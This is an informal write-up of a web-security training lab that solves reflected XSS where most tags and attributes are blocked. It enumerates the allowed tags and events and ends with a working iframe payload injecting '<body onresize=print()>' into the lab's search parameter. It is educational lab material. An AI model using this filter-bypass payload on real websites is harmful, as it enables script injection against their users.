[xss] lab reflected xss into html context with mos 75a9bee8a8574109a02e68fc92d546d9
[XSS] Lab: Reflected XSS into HTML context with most tags and attributes blocked
since we have a search box lets insert a canary and look for where it appears in the source/DOM.
by injecting a comment sequence we can see that we’re able to inject a comment sequence.
since this lab is blocking most tags lets use intruder to see which ones we can use.
the only one that passed was body:
now lets see which events it is blocking:
so there was a couple of different tags.
but the
but the important one is the onresize tag.
we can pass this through an iframe allowing us to create a onload event to have our iframe resized.
the original source of the iframe with be our URL with the search query in the URL.
<iframe id=”test” src=”https://0a39003a04afa69f8288a7b20027008c.web-security-academy.net/?search=<body+onresize%3D”print()”>” onload=this.style.width=’100px’> </iframe>
